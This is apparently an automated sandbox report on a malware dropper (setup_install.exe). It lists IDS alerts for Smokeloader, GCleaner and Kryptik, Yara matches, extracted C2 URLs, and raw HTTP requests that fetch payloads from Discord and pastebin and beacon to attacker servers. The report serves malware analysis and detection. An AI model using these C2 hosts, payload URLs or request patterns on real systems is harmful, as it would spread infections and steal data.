                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040FEE0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_00461F60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebx2_2_00461F60

                  Networking

                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:59995 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:59995 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:59977 -> 188.40.141.211:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60043 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60002 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60002 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60040 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60040 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60033 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60015 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60076 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60076 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:59968 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:59968 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60078 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60078 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2847712 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 17 : 192.168.2.4:59977 -> 188.40.141.211:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60033 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60115 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60115 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60015 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60048 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60057 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60043 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60101 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60085 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60082 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60082 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:59980 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:59980 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60097 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60052 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60045 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60045 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850316 - Severity 1 - ETPRO MALWARE Observed SmokeLoader CnC Activity : 192.168.2.4:59977 -> 188.40.141.211:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60006 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60048 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60066 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60013 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60013 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60063 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60063 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60006 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60103 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60085 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60010 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60097 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60052 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60010 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60061 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60066 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60061 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60057 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60018 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60018 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60103 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60088 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60070 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60070 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60024 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60022 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60022 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60024 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60101 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60073 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60073 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60027 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60106 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60027 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60106 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60088 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60093 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60093 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60110 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60110 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60113 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60031 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60113 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60031 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60055 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60055 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60036 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60036 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60091 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60091 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850107 - Severity 1 - ETPRO MALWARE Win32/Kryptik.HHNM Variant Retrieving Payload : 192.168.2.4:60118 -> 45.9.20.13:80
                  Source: Network trafficSuricata IDS: 2850938 - Severity 1 - ETPRO MALWARE GCleaner Downloader Activity M6 : 192.168.2.4:60118 -> 45.9.20.13:80
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.17e0e50.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.2.Mon1785436ae78.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mon1785436ae78.exe PID: 8076, type: MEMORYSTR
                  Source: Malware configuration extractorURLs: http://lecanardstsornin.com/upload/
                  Source: Malware configuration extractorURLs: http://m3600.com/upload/
                  Source: Malware configuration extractorURLs: http://camasirx.com/upload/
                  Source: Malware configuration extractorURLs: 135.181.129.119:4805
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficTCP traffic: 45.142.215.47 ports 27643,2,3,4,6,7
                  Source: DNS query: hsiens.xyz
                  Source: Yara matchFile source: Process Memory Space: Mon178817e243.exe PID: 7972, type: MEMORYSTR
                  Source: Yara matchFile source: 22.0.Mon178817e243.exe.e60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.30bf192.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.4:59936 -> 45.142.215.47:27643
                  Source: global trafficTCP traffic: 192.168.2.4:59971 -> 135.181.129.119:4805
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1a3jd7 HTTP/1.1Host: iplogger.org
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
                  Source: Joe Sandbox ViewIP Address: 172.67.133.215 172.67.133.215
                  Source: Joe Sandbox ViewIP Address: 45.133.1.107 45.133.1.107
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownDNS query: name: iplogger.org
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59988 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59953 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60075 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59942 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59994 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60112 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59991 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60067 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60000 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:60041 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59972 -> 162.159.130.233:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:59940 -> 172.67.132.113:443
                  Source: global trafficHTTP traffic detected: GET /raw/A7dSG1te HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /server.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: 45.133.1.107
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60viewport-width: 1920Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /api/setStats.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: wfsdragon.ru
                  Source: global trafficHTTP traffic detected: GET /base/api/statistics.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36Host: 51.178.186.149
                  Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmpeople.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: gmpeople.com
                  Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmpeople.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gmpeople.com
                  Source: unknownHTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:59938 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.133.1.107
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.142.215.47
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.178.186.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.129.119
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1a2jd7 HTTP/1.1User-Agent: m1011Host: iplogger.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1a3jd7 HTTP/1.1Host: iplogger.org
                  Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1Host: cdn.discordapp.com
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /partner/loot.php?pub=mixone HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: PJ-BQ-uz-Hc-7-yHost: 45.9.20.13Connection: Keep-AliveCache-Control: no-cache
